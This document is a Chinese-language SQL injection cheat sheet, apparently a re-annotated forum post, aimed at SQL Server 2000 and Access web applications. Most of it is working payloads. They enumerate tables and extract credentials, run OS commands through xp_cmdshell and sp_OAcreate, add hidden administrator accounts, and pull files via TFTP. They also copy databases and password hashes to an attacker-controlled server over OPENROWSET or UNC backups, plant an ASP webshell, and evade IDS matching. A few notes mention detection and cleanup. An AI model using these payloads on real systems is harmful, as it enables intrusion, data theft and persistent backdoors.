(说明:原帖经论坛转码,字符串两侧的单引号基本都被吞掉并混入了乱码,下面已按 T-SQL 语法补回引号。内容以 SQL Server 2000 时代的 MSSQL 为主,少数写法(asc/mid、msysobjects、%5c 爆库)针对 Access。)

2.猜表 一般的表名无非是 admin、adminuser、user、pass、password 等。
and 0<>(select count(*) from *)      -- 这里的 * 只是占位,实际要换成猜测的表名
and 0<>(select count(*) from admin)  -- 判断是否存在 admin 这张表:返回正常页面说明存在
3.猜帐号数目 如果 0< 返回正确页面、而 1< 返回错误页面,说明帐号数目就是 1 个。
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
猜列名还有: and (select count(列名) from 表名)>0
4.猜解字段名称 在 len() 括号里面填上我们猜测的字段名称。
and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(name)>0)       -- 猜用户名字段叫 name
and 1=(select count(*) from admin where len(password)>0)   -- 猜密码字段叫 password

5.猜解各个字段的长度 猜解长度就是把 >0 里的数字逐步变换,直到返回正确页面为止。
and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6)       错误
and 1=(select count(*) from admin where len(name)>5)       正确,长度是 6
and 1=(select count(*) from admin where len(name)=6)       正确
and 1=(select count(*) from admin where len(password)>11)  正确
and 1=(select count(*) from admin where len(password)>12)  错误,长度是 12
and 1=(select count(*) from admin where len(password)=12)  正确
猜长度还有: and (select top 1 len(username) from admin)>5
注:`len(*)` 不是合法写法,只是示意把字段名填进去;`1=(select count(*) ...)` 这种写法假定满足条件的行恰好只有一行,表里有多条记录时应改成 `0<(select count(*) ...)` 或 `select top 1 ...` 的形式,否则会误判。
6.猜解字符
and 1=(select count(*) from admin where left(name,1)='a')   -- 猜解用户帐号的第一位
and 1=(select count(*) from admin where left(name,2)='ab')  -- 猜解用户帐号的前两位
就这样一次加一个字符地猜,猜到刚才猜出来的长度为止,帐号就算出来了。(字符串两侧的单引号实际提交时必须带上。)

猜内容还有: and (select top 1 asc(mid(password,1,1)) from admin)>50   -- 用 ASCII 码比较
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51)--
这个查询语句也可以猜解中文的用户名和密码:只要把后面的数字换成对应字符的字符码,最后再把结果转换成字符即可。
注:asc()/mid() 是 Access(Jet)的函数,在 MSSQL 上对应写法是 ascii(substring(password,1,1));逐位比较时用 >/< 做二分查找,比逐个等号试探少得多的请求。
group by users.id having 1=1--
group by users.id, users.username, users.password, users.privs having 1=1--
; insert into users values( 666, 'attacker', 'foobar', 0xffff )--
注:这是 GROUP BY/HAVING 报错法——MSSQL 的错误信息会依次指出"未出现在 GROUP BY 中"的列名,每报一次错就把该列补进 GROUP BY,直到不再报错,从而拿到 users 表的全部列;它依赖页面回显数据库错误。下面的 insert 不带列名列表,值的个数和顺序必须与刚才枚举出的列一致。
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'--
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' AND COLUMN_NAME NOT IN ('login_id')--
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' AND COLUMN_NAME NOT IN ('login_id','login_name')--
UNION SELECT TOP 1 login_name FROM logintable--
UNION SELECT TOP 1 password FROM logintable WHERE login_name='Rahul'--
(注:原帖用"列名"代指 INFORMATION_SCHEMA.COLUMNS 里的 COLUMN_NAME 列;原帖一条语句里连写了两个 WHERE,第二个应为 AND。)

看服务器打的补丁:出错信息里带出版本串(例如显示打了 SP4),原理是把字符串和整数比较触发类型转换错误:
and 1=(select @@VERSION)--
看数据库连接账号的权限,返回正常,证明连接账号是服务器角色 sysadmin:
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'))--
判断连接数据库的帐号。(采用 sa 账号连接时返回正常 = 证明连接账号是 sa)
and 'sa'=(SELECT System_user)--
and user_name()='dbo'--
and 0<>(select user_name())--   -- 与整数比较触发转换错误,把当前数据库用户名带出来(原帖少了一个右括号)
看 xp_cmdshell 是否被删除:
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype='X' AND name='xp_cmdshell')--
xp_cmdshell 被删除后的恢复(第二种写法支持绝对路径):
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','c:\inetpub\wwwroot\xplog70.dll'--
注:以上针对 SQL Server 2000。从 2005 起 xp_cmdshell 默认关闭,需要 sysadmin 先执行 `EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;`。重新注册扩展过程、开启 xp_cmdshell 这类动作是防御方应当告警的高信号事件。
反向 PING 自己实验(确认命令是否真的执行了):
;use master;declare @s int;exec sp_oacreate 'wscript.shell',@s out;exec sp_oamethod @s,'run',NULL,'cmd.exe /c ping 192.168.0.1';--
加帐号:
;DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,'C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add'--
创建一个指向 E 盘的虚拟目录:
;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"'--
设置访问属性(配合写入一个 webshell):
;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse'--
注:sp_oacreate/sp_oamethod 是 OLE Automation 扩展过程,只有 sysadmin 能调用,SQL 2005 起默认关闭('Ole Automation Procedures' 选项);wscript.shell 的 run 不会把输出回传,所以用 ping 的出站连接来判断是否执行成功。mkwebdir.vbs/chaccess.vbs 需要事先放到语句里写的路径。
MSSQL 也可以用联合查询:
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin   (union 在 Access 下也好用)
注:union 两边的列数和类型必须一致,1..13 这些数字用来占位并定位哪一列会回显到页面;id=-1 让原查询不返回行,页面上显示的就是 union 部分的数据。

爆库特殊技巧:在 URL 路径中把最后一个 / 换成 %5c(即 \),让 ASP/Jet 报错并在错误信息里带出 Access 数据库的物理路径。
得到 WEB 路径:
;create table [dbo].[swap] ([swappass][char](255));--
and (select top 1 swappass from swap)=1--   -- 字符串与整数比较,借转换错误把值带出
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', @value_name='/', @value=@test OUTPUT insert into newtable(paths) values(@test)--
;use ku1;--
;create table cmd (str image);-- 建立 image 类型的表 cmd
注:xp_regread 的输出参数正确写法是 @value=@test OUTPUT(原帖写成 values=);插入的表名、列名应与上面 CREATE TABLE 建的 newtable(paths) 一致(原帖写成 paths(path))。该注册表键保存 IIS 虚拟目录到物理路径的映射;@test 声明为 varchar(20) 对较长的路径会截断,建议加大。

存在 xp_cmdshell 的测试过程:
;exec master..xp_cmdshell 'dir'
;exec master.dbo.sp_addlogin jiaoniang$;--   加 SQL 帐号
;exec master.dbo.sp_password null,jiaoniang$,1866574;--
;exec master.dbo.sp_addsrvrolemember 'jiaoniang$','sysadmin';--
;exec master.dbo.xp_cmdshell 'net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators jiaoniang$ /add';--
exec master..xp_servicecontrol 'start', 'schedule'   -- 启动服务
exec master..xp_servicecontrol 'start', 'server'
; DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,'C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add'
;DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,'C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add'
; exec master..xp_cmdshell 'tftp -i youip get file.exe'--   利用 TFTP 上传文件
;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
;declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
;declare @a sysname; set @a=db_name(); backup database @a to disk='\\你的IP\你的共享目录\bak.dat'
如果 xp_cmdshell 被限制,则可以用 openrowset 回连本机执行:
select * from openrowset('sqloledb','server';'sa';'','select ''OK!''; exec master.dbo.sp_addlogin hax')
注:sp_password 的参数顺序是(旧密码, 新密码, 登录名),原帖 null,jiaoniang$,1866574 疑似把后两项写反了,应为 null,'1866574','jiaoniang$';sp_addsrvrolemember 需要 sysadmin。帐号名以 $ 结尾是为了在 net user 的列表中隐藏。tftp 是明文协议且通常被出站过滤拦截;`backup database ... to disk=UNC路径` 是由 SQL Server 服务账号去写共享,会把整个库连同登录 hash 一起带出。openrowset 那条等于用 sa 空口令回连本机,依赖 sa 口令为空且 Ad Hoc Distributed Queries 可用。
查询构造:
SELECT * FROM news WHERE id=... AND topic=... AND .....
admin' and 1=(select count(*) from [user] where username='victim' and right(left(userpass,01),1)='1') and userpass <> '
select 123;--
;use master;--
a' or name like 'fff%';--   显示有一个叫 ffff 的用户。
and 1<>(select count(email) from [user]);--
;update [users] set email=(select top 1 name from sysobjects where xtype='u' and status>0) where name='ffff';--
;update [users] set email=(select top 1 id from sysobjects where xtype='u' and name='ad') where name='ffff';--
;update [users] set email=(select top 1 name from sysobjects where xtype='u' and id>581577110) where name='ffff';--
;update [users] set email=(select top 1 count(id) from password) where name='ffff';--
;update [users] set email=(select top 1 pwd from password where id=2) where name='ffff';--
;update [users] set email=(select top 1 name from password where id=2) where name='ffff';--
上面第一条 update 是得到数据库中的第一个用户表,并把表名放在 ffff 用户的邮箱字段中;通过查看 ffff 的用户资料可知第一个用户表叫 ad。
然后根据表名 ad 得到这个表的 ID,再用 id>该ID 得到第二个表的名字,依此类推。
insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--
insert into users values( 667,'123','123',0xffff)--
insert into users values ( 123, 'admin''--', 'password', 0xffff)--
注:char(0x63)... 拼出的是 'chris',用于单引号被过滤时不写字面字符串;'admin''--' 这条是把注释符塞进用户名,之后若登录语句把用户名直接拼进 SQL,其后的密码条件就会被注释掉(二次注入)。把查询结果写进 email 这类可回显字段会直接篡改业务数据,测试时要留痕并恢复。
;and user>0
;and (select count(*) from sysobjects)>0
;and (select count(*) from msysobjects)>0   // 为 Access 数据库(原帖写作 mysysobjects,Access 系统表名为 msysobjects,默认不允许读取)
枚举出数据表名:
;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0);--
这是将第一个表名更新到 aaa 的字段处。读出第一个表后,第二个表可以这样读出来(在条件后加上 and name<>'刚才得到的表名'):
;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0 and name<>'vote');--
然后 id=1552 and exists(select * from aaa where aaa>5)
读出第二个表,一个个地读出,直到没有为止。
读字段是这样:
;update aaa set aaa=(select top 1 col_name(object_id('表名'),1));--
然后 id=152 and exists(select * from aaa where aaa>5) 出错,得到字段名
;update aaa set aaa=(select top 1 col_name(object_id('表名'),2));--
然后 id=152 and exists(select * from aaa where aaa>5) 出错,得到字段名

[获得数据表名] 将字段值更新为表名,再想法读出这个字段的值就可得到表名:
update 表名 set 字段=(select top 1 name from sysobjects where xtype='u' and status>0 [ and name<>'你得到的表名' 查出一个加一个]) [ where 条件]
select top 1 name from sysobjects where xtype='u' and status>0 and name not in('table1','table2',…)
[获得数据表字段名] 将字段值更新为字段名,再想法读出这个字段的值就可得到字段名:
update 表名 set 字段=(select top 1 col_name(object_id('要查询的数据表名'),字段序号,例如 1)) [ where 条件]
通过 SQLSERVER 注入漏洞建数据库管理员帐号和系统管理员帐号 [当前帐号必须是 SYSADMIN 组]
注:`and user>0` 是把 user(当前用户名,字符型)与整数比较,借转换错误把用户名带出,同时可区分 MSSQL 与 Access(Access 报的是另一种错误);`aaa>5` 同理靠转换错误回显,都要求页面返回数据库错误信息。
绕过 IDS 的检测 [使用变量]:
;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
;declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
(注:字符串拼接后 exec @a 以变量名执行存储过程,只能躲开对 "xp_cmdshell" 字面量的简单匹配;检测侧应同时匹配 declare … exec @ 这类模式以及 sp_OA*、openrowset、xp_dirtree 等关键字。)

1、开启远程数据库
基本语法:
select * from OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=123', 'select * from table1')
参数:(1) OLEDB Provider 名称 (2) 连接字符串 (3) 要在远端执行的查询
2、其中连接字符串参数可以指定任意端口用来连接,比如:
select * from OPENROWSET('SQLOLEDB', 'uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;', 'select * from table')
3、复制目标主机的整个数据库:insert 所有远程表到本地表。
基本语法:
insert into OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=123', 'select * from table1') select * from table2
这行语句将目标主机上 table2 表中的所有数据复制到远程数据库(攻击者自己那台 SQL Server)的 table1 表中。实际运用中适当修改连接字符串的 IP 地址和端口,指向需要的地方,比如:
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from table1') select * from table2
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _sysdatabases') select * from master.dbo.sysdatabases
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _sysobjects') select * from user_database.dbo.sysobjects
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _syscolumns') select * from user_database.dbo.syscolumns
复制数据库:
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from table1') select * from database..table1
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from table2') select * from database..table2
复制哈希表(HASH):登录密码的 hash 存储于 sysxlogins 中,方法如下:
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _sysxlogins') select * from database.dbo.sysxlogins
得到 hash 之后,就可以进行暴力破解。
注:192.168.0.1 是攻击者控制的 SQL Server,目标库的数据通过 TCP 1433 出站推送到该地址,事先要在接收端建好同结构的 _sysdatabases/_sysobjects/_syscolumns/_sysxlogins 表。这要求目标能出站连 1433 且 Ad Hoc Distributed Queries 可用(SQL 2005 起默认关闭)。sysxlogins 只存在于 SQL 2000,2005 起为 sys.sql_logins,读取 password_hash 需要 CONTROL SERVER 权限。对目标方而言,数据库服务账号主动向外发起 1433 连接本身就是应当告警的异常。
遍历目录的方法:先创建一个临时表 temp:
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;--   获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--   获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--   获得所有子目录的目录树结构,并存入 temp 表中
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--   查看某个文件的内容
;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';--
;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\ *.asp /s/a';--
;insert into temp(id) exec master.dbo.xp_cmdshell 'cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc'
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--   (xp_dirtree 适用权限 PUBLIC)
注:insert ... exec 要求目标列的个数、类型与存储过程的结果集一致——xp_availablemedia 返回 4 列、xp_dirtree 返回 2 列、xp_subdirs 和 xp_cmdshell 返回 1 列,这就是 temp 建 4 列而其它语句只写 id 或 id,num1 的原因。之后再用 and (select top 1 id from temp)=1 这类转换错误把结果逐行读出。

判断当前登录属于哪个固定服务器角色(返回正常即属于):
语句1: and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--
语句2: and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));--
语句3: and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--
语句4: and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--
语句5: and 1=(SELECT IS_SRVROLEMEMBER('processadmin'));--   (原帖此处重复了 securityadmin,按固定服务器角色列表应为 processadmin)
语句6: and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--
语句7: and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--
语句8: and 1=(SELECT IS_SRVROLEMEMBER('dbcreator'));--   (原帖此处重复了 bulkadmin,按固定服务器角色列表应为 dbcreator)
语句9: and 1=(SELECT IS_MEMBER('db_owner'));--
把路径写到表中去:
;create table dirs(paths varchar(100), id int)--
;insert dirs exec master.dbo.xp_dirtree 'c:\'--
and 0<>(select top 1 paths from dirs)--
and 0<>(select top 1 paths from dirs where paths not in('Inetpub'))--
;create table dirs1(paths varchar(100), id int)--
;insert dirs1 exec master.dbo.xp_dirtree 'e:\web'--
and 0<>(select top 1 paths from dirs1)--
(注:原帖第二次 insert 写的是 dirs,按上下文应为刚建的 dirs1;paths varchar(100) 对较长的目录名会截断或插入失败。)
把数据库备份到网页目录,然后下载:
;declare @a sysname; set @a=db_name(); backup database @a to disk='e:\web\down.bak';--
(注:备份文件包含整个库,放在 web 根目录下任何人都能下载,测试后务必删除。)

and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)
and 1=(Select Top 1 col_name(object_id('USER_LOGIN'),1) from sysobjects)   -- 参看相关表
and 1=(select user_id from USER_LOGIN)
and 0=(select user from USER_LOGIN where user>1)
注:char(85)='U',是单引号被过滤时写 xtype='U'(用户表)的办法;先 top N ... order by id desc 再取 top 1,可以依次拿到第 N 个表名。
-=- wscript.shell example -=-
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe'--

-- 用 scripting.filesystemobject 读文件
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
    print @line
    exec @ret = sp_oamethod @f, 'readline', @line out
end

-- 用 scripting.filesystemobject 写 webshell
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, '<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>'

-- speech.voicetext 示例:让服务器朗读,只是演示 OLE 自动化能实例化任意 COM 对象
declare @o int, @ret int
exec sp_oacreate 'speech.voicetext', @o out
exec sp_oamethod @o, 'register', NULL, 'foo', 'bar'
exec sp_oasetproperty @o, 'speed', 150
exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to us', 528
waitfor delay '00:00:05'
; declare @o int, @ret int exec sp_oacreate 'speech.voicetext', @o out exec sp_oamethod @o, 'register', NULL, 'foo', 'bar' exec sp_oasetproperty @o, 'speed', 150 exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to us', 528 waitfor delay '00:00:05'--
注:print @line 的输出只在查询分析器里可见,通过注入点读文件时应改为写入表再读出;foo.asp 是一个无任何鉴权、直接执行 cmd 参数的后门,留在 web 根下极其危险,测试完必须清除。
xp_dirtree 适用权限 PUBLIC:
exec master.dbo.xp_dirtree 'c:\'   返回的信息有两个字段 subdirectory、depth:subdirectory 字段是字符型,depth 字段是整型。
create table dirs(paths varchar(100), id int)
建表,这里建的表是和上面 xp_dirtree 相关联的:字段个数相等、类型相同。
insert dirs exec master.dbo.xp_dirtree 'c:\'
只要我们建的表与存储过程返回的字段定义一致就能够执行,达到写表的效果,一步步得到我们想要的信息。
注:xp_dirtree 对 public 开放意味着低权限的库账号也能列目录,是 xp_cmdshell 不可用时探测 web 路径的常用手段;它同样接受 UNC 路径,可让 SQL 服务账号向外发起 SMB 认证,防御侧应监控数据库服务器的出站 445 连接。